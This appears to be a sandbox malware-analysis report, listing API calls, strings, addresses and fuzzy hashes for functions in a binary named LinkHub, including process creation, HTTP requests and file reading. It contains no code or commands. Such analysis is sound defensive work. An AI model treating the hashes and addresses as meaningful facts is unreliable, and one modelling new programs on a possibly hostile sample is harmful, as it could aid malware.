                                                                    • Instruction ID: b07d5de796e2a7e16130551cbff89755604f135e12dd64ef1d86f3fa34e71f99
                                                                    • Opcode Fuzzy Hash: b4ec3175b8650e44814c1c302597c114c7afbcfe82cac48c9b19fa332b906c1e
                                                                    • Instruction Fuzzy Hash: 52718B31900706AFDB20DFA8DE49AAEBBF9FF48704F144919E186A25A0DB71ED54CB50
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 002C0884
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 002C088F
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 002C089A
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 002C08A5
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 002C08B0
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 002C08BB
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 002C08C6
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 002C08D1
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 002C08DC
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 002C08E7
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 002C08F2
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 002C08FD
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 002C0908
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 002C0913
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 002C091E
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 002C0929
                                                                    • GetCursorInfo.USER32(?), ref: 002C0939
                                                                    • GetLastError.KERNEL32 ref: 002C097B
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                    • String ID:
                                                                    • API String ID: 3215588206-0
                                                                    • Opcode ID: 5ac73e5979cab31789a0155e546cc0104f7cb3c14f416526d93ec5211ce95702
                                                                    • Instruction ID: 424c3d69b3a460bff5abc5a6719e88aa188f65ac8186f3619226dd39a75c42a1
                                                                    • Opcode Fuzzy Hash: 5ac73e5979cab31789a0155e546cc0104f7cb3c14f416526d93ec5211ce95702
                                                                    • Instruction Fuzzy Hash: D5415470D4831AAADB109FBA8CC9D5EBFE8FF04754B50462AE11CE7281DA78D801CF91
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k0
                                                                    • API String ID: 176396367-430002465
                                                                    • Opcode ID: 9411efc6ee28833e479a6a683f4971b1bff60aef00878a8ce7a70ebb62ea55b6
                                                                    • Instruction ID: 866f2ecd471a087ce288b830e9d3a8dd9fed946fc0b1259950ae2d09a5f31cf7
                                                                    • Opcode Fuzzy Hash: 9411efc6ee28833e479a6a683f4971b1bff60aef00878a8ce7a70ebb62ea55b6
                                                                    • Instruction Fuzzy Hash: 33E1E332A205169BCB18DFB4C9516EDFBB5BF16710F10412AF456E7290DF309EB98B90
                                                                    APIs
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 002D9BA3
                                                                      • Part of subcall function 002D80AE: ClientToScreen.USER32(?,?), ref: 002D80D4
                                                                      • Part of subcall function 002D80AE: GetWindowRect.USER32(?,?), ref: 002D814A
                                                                      • Part of subcall function 002D80AE: PtInRect.USER32(?,?,?), ref: 002D815A
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002D9C0C
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002D9C17
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002D9C3A
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002D9C81
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002D9C9A
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 002D9CB1
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 002D9CD3
                                                                    • DragFinish.SHELL32(?), ref: 002D9CDA
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 002D9DCD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(1$(1
                                                                    • API String ID: 221274066-3437283062
                                                                    • Opcode ID: e4504e65093fc28fba418f18ba15b854b5a4038953ad3faedd8708dafa37d8d9
                                                                    • Instruction ID: 025b1379ea4db77358157ea56e9b3a582c5a3cf77d2d6d18e7f7924f42aa2c7b
                                                                    • Opcode Fuzzy Hash: e4504e65093fc28fba418f18ba15b854b5a4038953ad3faedd8708dafa37d8d9
                                                                    • Instruction Fuzzy Hash: 79617971518301AFC706EF60DC89DABBBE8FF89750F40091EF591922A1DB70AA59CF52
                                                                    APIs
                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00260436
                                                                      • Part of subcall function 0026045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0031170C,00000FA0,17198003,?,?,?,?,00282733,000000FF), ref: 0026048C
                                                                      • Part of subcall function 0026045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00282733,000000FF), ref: 00260497
                                                                      • Part of subcall function 0026045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00282733,000000FF), ref: 002604A8
                                                                      • Part of subcall function 0026045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 002604BE
                                                                      • Part of subcall function 0026045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002604CC
                                                                      • Part of subcall function 0026045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002604DA
                                                                      • Part of subcall function 0026045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00260505
                                                                      • Part of subcall function 0026045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00260510
                                                                    • ___scrt_fastfail.LIBCMT ref: 00260457
                                                                      • Part of subcall function 00260413: __onexit.LIBCMT ref: 00260419
                                                                    Strings
                                                                    • kernel32.dll, xrefs: 002604A3
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00260492
                                                                    • SleepConditionVariableCS, xrefs: 002604C4
                                                                    • InitializeConditionVariable, xrefs: 002604B8
                                                                    • WakeAllConditionVariable, xrefs: 002604D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 66158676-1714406822
                                                                    • Opcode ID: 6691831a99cd5f9400a715277b45ec35920c89b45c3bc49143589e81a57054ca
                                                                    • Instruction ID: f8ef7387bc678a01cf0774f9be12e88d65eabbc83311e948fb36ccac07a276ca
                                                                    • Opcode Fuzzy Hash: 6691831a99cd5f9400a715277b45ec35920c89b45c3bc49143589e81a57054ca
                                                                    • Instruction Fuzzy Hash: 11210E32AA57056BD7222FA4AC89BAB7798EB09B51F400116F905932C0DFB09C919E64
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(00000000,00000000,002DDCD0), ref: 002B4F6C
                                                                    • _wcslen.LIBCMT ref: 002B4F80
                                                                    • _wcslen.LIBCMT ref: 002B4FDE
                                                                    • _wcslen.LIBCMT ref: 002B5039
                                                                    • _wcslen.LIBCMT ref: 002B5084
                                                                    • _wcslen.LIBCMT ref: 002B50EC
                                                                      • Part of subcall function 0025FD52: _wcslen.LIBCMT ref: 0025FD5D
                                                                    • GetDriveTypeW.KERNEL32(?,00307C10,00000061), ref: 002B5188
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2055661098-1000479233
                                                                    • Opcode ID: 6af7c4ab6626345b455339e2c6a26e63582464ee1d694be3aba0dcf54a15a9ad
                                                                    • Instruction ID: abbc404d85a47b7f43430c68fbcca12d6e381fdb1ace1be0c1f275a92acb7f84
                                                                    • Opcode Fuzzy Hash: 6af7c4ab6626345b455339e2c6a26e63582464ee1d694be3aba0dcf54a15a9ad
                                                                    • Instruction Fuzzy Hash: 3FB116316397129FC714EF28C890BAAB7E5BF94790F10491DF4958B292D770DCA4CB92
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 002CBBF8
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CBC10
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CBC34
                                                                    • _wcslen.LIBCMT ref: 002CBC60
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CBC74
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CBC96
                                                                    • _wcslen.LIBCMT ref: 002CBD92
                                                                      • Part of subcall function 002B0F4E: GetStdHandle.KERNEL32(000000F6), ref: 002B0F6D
                                                                    • _wcslen.LIBCMT ref: 002CBDAB
                                                                    • _wcslen.LIBCMT ref: 002CBDC6
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002CBE16
                                                                    • GetLastError.KERNEL32(00000000), ref: 002CBE67
                                                                    • CloseHandle.KERNEL32(?), ref: 002CBE99
                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CBEAA
                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CBEBC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CBECE
                                                                    • CloseHandle.KERNEL32(?), ref: 002CBF43
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 2178637699-0
                                                                    • Opcode ID: c68058476cdca8038a676bd576e374d6eead22e8ba064c83cc37e75f82d21a75
                                                                    • Instruction ID: 653af9b07e03030c1e5fd0403966b0708fd7c997d1ff494fb868ef95cfde82cb
                                                                    • Opcode Fuzzy Hash: c68058476cdca8038a676bd576e374d6eead22e8ba064c83cc37e75f82d21a75
                                                                    • Instruction Fuzzy Hash: 28F1B0316243019FC715EF24C892F6ABBE5AF85314F14865EF8894B2A2CB71EC64CF52
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,002DDCD0), ref: 002C4B18
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002C4B2A
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,002DDCD0), ref: 002C4B4F
                                                                    • FreeLibrary.KERNEL32(00000000,?,002DDCD0), ref: 002C4B9B
                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,002DDCD0), ref: 002C4C05
                                                                    • SysFreeString.OLEAUT32(00000009), ref: 002C4CBF
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002C4D25
                                                                    • SysFreeString.OLEAUT32(?), ref: 002C4D4F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 354098117-199464113
                                                                    • Opcode ID: a30eb3156405226e28fd2f5a4f77dd77fddd23b947bcdac24e147e1fcc6d9634
                                                                    • Instruction ID: af6e545cb832aeb1eb191bbfd2a1f019815fddceac133f0a84f8c58df7bbab8f
                                                                    • Opcode Fuzzy Hash: a30eb3156405226e28fd2f5a4f77dd77fddd23b947bcdac24e147e1fcc6d9634
                                                                    • Instruction Fuzzy Hash: 81125A71A10106EFDB14DF94C898EAABBB5FF45318F14819DF8099B261C771EE52CBA0
                                                                    APIs
                                                                    • GetMenuItemCount.USER32(003129C0), ref: 00283F72
                                                                    • GetMenuItemCount.USER32(003129C0), ref: 00284022
                                                                    • GetCursorPos.USER32(?), ref: 00284066
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0028406F
                                                                    • TrackPopupMenuEx.USER32(003129C0,00000000,?,00000000,00000000,00000000), ref: 00284082
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0028408E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                    • String ID: 0
                                                                    • API String ID: 36266755-4108050209
                                                                    • Opcode ID: d2507593294439faa77738c738c651ab0dee335c07ce864cc91a6d330f801de7
                                                                    • Instruction ID: e03a9e04d70bf21dbc5350a9d6cb59cc99897c729383e9b9952c560fc832a7c6
                                                                    • Opcode Fuzzy Hash: d2507593294439faa77738c738c651ab0dee335c07ce864cc91a6d330f801de7
                                                                    • Instruction Fuzzy Hash: 9471D334A65206BBEB25EF28DC49FAABF68FF05764F100216F614661D0C7B19D20DB90
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,?), ref: 002D7823
                                                                      • Part of subcall function 00248577: _wcslen.LIBCMT ref: 0024858A
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002D7897
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002D78B9
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002D78CC
                                                                    • DestroyWindow.USER32(?), ref: 002D78ED
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00240000,00000000), ref: 002D791C
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002D7935
                                                                    • GetDesktopWindow.USER32 ref: 002D794E
                                                                    • GetWindowRect.USER32(00000000), ref: 002D7955
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002D796D
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002D7985
                                                                      • Part of subcall function 00242234: GetWindowLongW.USER32(?,000000EB), ref: 00242242
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 2429346358-3619404913
                                                                    • Opcode ID: bf6d688d1411952852ae174453d1996190034a43e09496be38c59845618ceb82
                                                                    • Instruction ID: 48cceadb169ce1b8e079e5b28a242892ad92a796059b9218414dffbee02d0f80
                                                                    • Opcode Fuzzy Hash: bf6d688d1411952852ae174453d1996190034a43e09496be38c59845618ceb82
                                                                    • Instruction Fuzzy Hash: 8A719571518241AFD725CF18CC48FAABBE9EB89300F04445FF884873A0DB74AC26DB11
                                                                    APIs
                                                                      • Part of subcall function 00241802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00241488,?,00000000,?,?,?,?,0024145A,00000000,?), ref: 00241865
                                                                    • DestroyWindow.USER32(?), ref: 00241521
                                                                    • KillTimer.USER32(00000000,?,?,?,?,0024145A,00000000,?), ref: 002415BB
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 002829B4
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0024145A,00000000,?), ref: 002829E2
                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0024145A,00000000,?), ref: 002829F9
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0024145A,00000000), ref: 00282A15
                                                                    • DeleteObject.GDI32(00000000), ref: 00282A27
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID: <)1
                                                                    • API String ID: 641708696-3349699127
                                                                    • Opcode ID: 6d72efd61e5066556ef6d6674622ee98dbb63771c88d912c7489a4676f646952
                                                                    • Instruction ID: 2f48143612bfee33618a2b03d8e08852a4fe19979b2d2472acf082bbe2a9ba7e
                                                                    • Opcode Fuzzy Hash: 6d72efd61e5066556ef6d6674622ee98dbb63771c88d912c7489a4676f646952
                                                                    • Instruction Fuzzy Hash: 6F616C35522B12DFDB3A9F18D948B6AB7B5FF84312F508119E443966A0C770ACB4DF84
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002BCEF5
                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002BCF08
                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002BCF1C
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002BCF35
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 002BCF78
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002BCF8E
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002BCF99
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002BCFC9
                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002BD021
                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002BD035
                                                                    • InternetCloseHandle.WININET(00000000), ref: 002BD040
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                    • String ID:
                                                                    • API String ID: 3800310941-3916222277
                                                                    • Opcode ID: 8356fe65c5de0c8fb55f2a8a4f37482850553a542aa4e8af7e4beaa4633fb22e
                                                                    • Instruction ID: 34ecaf828880a5ba862cd53a3ca9acf54c87b82274df34158cd0243746148186
                                                                    • Opcode Fuzzy Hash: 8356fe65c5de0c8fb55f2a8a4f37482850553a542aa4e8af7e4beaa4633fb22e
                                                                    • Instruction Fuzzy Hash: 78518FB1511609BFEB219F60DC88AFBBBBCFF08794F10441AF94596110E734DD55AB60
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002D66D6,?,?), ref: 002D8FEE
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002D66D6,?,?,00000000,?), ref: 002D8FFE
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002D66D6,?,?,00000000,?), ref: 002D9009
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,002D66D6,?,?,00000000,?), ref: 002D9016
                                                                    • GlobalLock.KERNEL32(00000000), ref: 002D9024
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002D66D6,?,?,00000000,?), ref: 002D9033
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002D903C
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,002D66D6,?,?,00000000,?), ref: 002D9043
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002D66D6,?,?,00000000,?), ref: 002D9054
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,002E0C04,?), ref: 002D906D
                                                                    • GlobalFree.KERNEL32(00000000), ref: 002D907D
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 002D909D
                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 002D90CD
                                                                    • DeleteObject.GDI32(00000000), ref: 002D90F5
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002D910B
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
